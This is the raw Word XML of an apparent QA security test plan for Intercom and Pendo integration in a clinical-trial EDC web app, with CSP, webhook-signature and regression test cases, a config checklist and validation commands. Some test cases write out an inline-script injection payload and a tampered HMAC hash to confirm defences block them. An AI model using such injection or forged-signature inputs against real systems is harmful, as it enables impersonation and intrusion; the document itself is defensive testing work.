            </w:r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BD36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Content-Security-Policy header includes Intercom and Pendo domains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AAFC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curl -I 'https://edcapp.medrio.com/dashboard' \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EA78B07" w14:textId="1A412E40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-H 'Cookie: {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valid_session_cookie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}' \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C8D603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| grep -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i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'content-security-policy'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0DB3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Header present: Content-Security-Policy</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19D5F65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script-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src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includes: *.intercom.io *.intercomcdn.com *.pendo.io</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4059288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connect-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src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includes: *.intercom.io api.intercom.io app.pendo.io</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3774753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frame-ancestors: 'self' *.intercom.io</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09C2C03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No 'unsafe-inline' in script-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src</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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3C429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920C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A4701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980B9"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="795DAECA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6E89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TC-CSP-002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6759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V-07,V-10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B4381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D35400"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>CSP</w:t>
            </w:r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9978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Injected inline script blocked by CSP — violation logged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73D4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// Via browser console (simulating injection):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C76DD2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const s =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document.createElement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('script'</w:t>
            </w:r>
            <w:proofErr w:type="gram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);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="1710087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s.textContent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= "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window.Intercom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('shutdown');</w:t>
            </w:r>
            <w:proofErr w:type="gram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";</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="5D20FC5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document.head.appendChild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(s</w:t>
            </w:r>
            <w:proofErr w:type="gram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);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="557D8A4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// Also attempt via DOM injection:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C2E4BC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document.body.innerHTML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+= '&lt;script&gt;alert(1)&lt;\/script&gt;';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1E4C3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Script NOT executed — CSP blocks inline script</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="505FA16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Browser console: CSP violation error logged</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FC056D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'Refused to execute inline script' message present</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10D16A0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No Intercom shutdown triggered</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CDE41A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lastRenderedPageBreak/>
              <w:t>CSP report-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uri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receives violation report (if configured)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A523B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166B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F6189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980B9"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="66B68B51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77C6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TC-REG-001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C99E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V-01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8A030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Regression</w:t>
            </w:r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61B8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Valid authenticated EDC user boots Intercom widget post-patch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B6FA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1. Login to EDC as role=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SiteUser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, user=qa_user@medrio.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34A6159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2. Navigate to /dashboard</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6296C16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3. Observe Intercom widget (bottom-right launcher)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C8694A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4. Click launcher → chat window opens</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6202839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5. Verify pre-filled context: name, email, study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E3FE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HTTP 200 from Intercom boot (Network tab)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2766157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Widget visible: launcher icon rendered within 3s of page load</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1251ADC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Chat window opens on click</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62846C5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User context </w:t>
            </w:r>
            <w:proofErr w:type="gram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shown:</w:t>
            </w:r>
            <w:proofErr w:type="gram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name='QA User', email='qa_user@medrio.com'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D3CC5D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Console: 0 Intercom-related errors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E44C2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0B22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F3665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888888"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="50FCB4B3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B9F5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TC-REG-002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C51D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V-06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CE719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Regression</w:t>
            </w:r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A67D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Legitimate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conversation.user.replied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webhook processed correctly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DD6E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# Send valid Intercom webhook event:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="206A402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payload='{"type":"conversation.user.replied","id":"conv_88441","data":{"item":{"id":"conv_88441"}}}'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="272CB32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sig=$(echo -n "$payload" |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openssl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dgst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-sha256 -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hmac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"$INTERCOM_WEBHOOK_SECRET" | awk '{print $2}')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78E27AF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curl -X POST '.../webhooks/intercom' \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23956493" w14:textId="52FE4799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-H "X-Hub-Signature-256: sha256=$sig" \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35403072" w14:textId="26017087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-d "$payload"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F657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HTTP 200 OK from webhook endpoint</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A34A78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Conversation state updated in EDC DB</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="010CA8E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Log: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event_processed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type=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conversation.user.replied</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="5DB8C09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No signature rejection error</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13C0774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No duplicate processing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CED15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015F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8A989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888888"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="512E6BC4" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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D1F4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TC-REG-003</w:t>
            </w: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4CD7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V-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8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C1C2F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5"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Regression</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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226D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Intercom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custom_attributes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with safe values written and displayed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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9ECC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window.Intercom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('update', {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C8DC891" w14:textId="50A96EB6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custom_attributes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: {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36542BBB" w14:textId="14136DBD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study_name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: 'Phase3-Oncology-Study',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="561E8298" w14:textId="53DB6CF6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site_id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: 'SITE_042',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B84DD01" w14:textId="66E47ADA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 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user_role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: '</w:t>
            </w:r>
            <w:proofErr w:type="spell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SiteUser</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="631F5CC2" w14:textId="3B4C749D" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="0038631E">
            <w:pPr>
              <w:spacing w:before="15" w:after="15"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r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 xml:space="preserve"> </w:t>
            </w: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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45365FC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}</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/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);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="5206602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1A1A2E"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>// Verify in Intercom messenger contact details</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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40E8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All 3 attributes visible in Intercom messenger contact card</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05CE917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Values match exactly: 'Phase3-Oncology-Study', 'SITE_042', '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SiteUser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'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60AF20B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No HTML encoding artifacts on display</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="398756A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API: GET /contacts/{id} shows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custom_attributes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with correct values</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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3879B" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00AE1C1B">
            <w:pPr>
              <w:spacing w:before="15" w:after="15"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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5F75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888888"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="64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F6B26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888888"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7CE92BAC" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00AE1C1B">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="183D4DCA" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="8" w:space="3" w:color="1F4E79"/>
        </w:pBdr>
        <w:spacing w:before="320" w:after="100"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Section 4 — Intercom &amp; Pendo Config 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"/>
        <w:gridCol w:w="1467"/>
        <w:gridCol w:w="2274"/>
        <w:gridCol w:w="3488"/>
        <w:gridCol w:w="1215"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="60768198" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr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DEBDE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Config Item</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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E60F1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Expected Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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9C75C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Where </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/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Verified</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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1DBAD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Env Var / Key</w:t>
            </w:r>
          </w:p>
        </w:tc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57215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Risk if Wrong</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="50ECC99B" w14:textId="77777777"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688B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Identity Verification (EDC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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704C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Enabled = true in Intercom workspace settings</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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E562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Intercom dashboard → Settings → Identity Verification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AE6B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0D6655"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>INTERCOM_IDENTITY_VERIFICATION_ENABLED=true</w:t>
            </w:r>
          </w:p>
        </w:tc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0B85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C0392B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Users can be impersonated — any </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0038631E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>user_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0038631E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> accepted without proof</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="03C9D393" w14:textId="77777777"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F1DA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lastRenderedPageBreak/>
              <w:t>HMAC Secret (EDC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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110B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32-char hex string, not hardcoded</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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B2B2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grep -r 'INTERCOM_IDENTITY_SECRET'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src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/ → 0 results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3358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0D6655"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>INTERCOM_IDENTITY_SECRET</w:t>
            </w:r>
          </w:p>
        </w:tc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89AD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proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0038631E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Attacker</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0038631E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> can forge </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0038631E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>user_hash</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0038631E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> for any </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0038631E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>user_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="1B641D1A" w14:textId="77777777"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6665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Intercom API Token scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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23EA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Read+Write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on conversations only — NOT full-access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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A552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Intercom Settings → API Keys → Token scopes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078E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0D6655"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>INTERCOM_API_TOKEN_EDC</w:t>
            </w:r>
          </w:p>
        </w:tc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B0C5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C0392B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Over-scoped token exposes all workspace data if leaked</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="4DAAADBF" w14:textId="77777777"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D1F3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Webhook Signature Secret</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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3B10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Present in env var only; not in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appsettings.json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or Git</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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C871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git log -S 'INTERCOM_WEBHOOK_SECRET' → 0 results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27FDF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0D6655"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>INTERCOM_WEBHOOK_SECRET</w:t>
            </w:r>
          </w:p>
        </w:tc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78AF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C0392B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Unsigned webhooks accepted → attacker can fake events</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="4B82F4FC" w14:textId="77777777"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862F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CSP: script-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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src</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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84FE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Includes *.intercom.io *.intercomcdn.com *.pendo.io</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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E2C0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curl -I edcapp.medrio.com | grep content-security-policy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C03F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0D6655"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>HTTP Response Header</w:t>
            </w:r>
          </w:p>
        </w:tc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0615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proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0038631E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Attacker</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0038631E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> can inject scripts from external domains</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="7180CA11" w14:textId="77777777"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D521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CSP: frame-ancestors</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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347C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'self' *.intercom.io — no wildcard *</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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6384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Same curl </w:t>
            </w:r>
            <w:proofErr w:type="gram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check</w:t>
            </w:r>
            <w:proofErr w:type="gram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above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A979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0D6655"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>HTTP Response Header</w:t>
            </w:r>
          </w:p>
        </w:tc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78AB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C0392B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Clickjacking attack possible via </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0038631E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>iframe</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0038631E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> embedding</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="57F4FC85" w14:textId="77777777"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4F4A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Pendo API Key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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B462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Present in env var; not embedded in public JS bundle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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DF2C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Browser DevTools → Sources → search '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pendo_api_key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'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8464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0D6655"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>PENDO_API_KEY</w:t>
            </w:r>
          </w:p>
        </w:tc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D57F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C0392B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Key abuse for fake event injection into Pendo analytics</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="602FCAFB" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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85DF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Intercom API Version header</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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9E34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Intercom-Version: 2.11 in all backend calls</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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0580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Code review Intercom client config + network logs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E0AD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eastAsia="Courier New" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="0D6655"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>INTERCOM_API_VERSION=2.11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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1BA9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C0392B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Version drift causes undocumented breaking changes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="248AEBC2" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00AE1C1B">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00832C86" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Quick Validation Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434FC940" w14:textId="4DA7BC3F" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="12" w:space="6" w:color="2E75B6"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F9"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pP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# Check HMAC secret is set (non-empty) echo $INTERCOM_IDENTITY_SECRET | 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wc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-c # Expected: &gt; 0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># Check secret not hardcoded in source grep -r 'INTERCOM_IDENTITY_SECRET' ./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src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--include='*.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cs'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--include='*.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json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' # Expected: 0 matches in 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appsettings.json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or committed files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># Verify CSP header present curl -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sI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https://edcapp-qa.medrio.com/dashboard | grep -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i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content-security-policy # Expected: script-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src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includes *.intercom.io *.pendo.io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># Verify Intercom API version in backend client config grep -r 'Intercom-Version' ./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src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# Expected: 'Intercom-Version: 2.11' in Intercom HTTP client setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E87B68" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00AE1C1B">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FD3444E" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="8" w:space="3" w:color="1F4E79"/>
        </w:pBdr>
        <w:spacing w:before="320" w:after="100"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Section 5 — Tools &amp; Execution Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F06A61" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Identity Verification — HMAC Generation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302E09CB" w14:textId="72076D02" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="12" w:space="6" w:color="2E75B6"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F9"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pP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# Generate valid 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user_hash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for usr_qa_001 echo -n 'usr_qa_001' | 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openssl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dgst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-sha256 -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hmac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"$INTERCOM_IDENTITY_SECRET" # Output: SHA2-256(stdin)= &lt;64-char hex hash&gt;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# Generate tampered hash (flip last char) for TC-IV-002 VALID_HASH=$(echo -n 'usr_qa_001' | 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openssl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dgst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-sha256 -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hmac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"$INTERCOM_IDENTITY_SECRET" | awk '{print $2}') TAMPERED=${VALID_HASH:0:-1}X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# Replace last char with 'X' echo $TAMPERED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713A8291" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00AE1C1B">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CAFDC00" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="22"/>
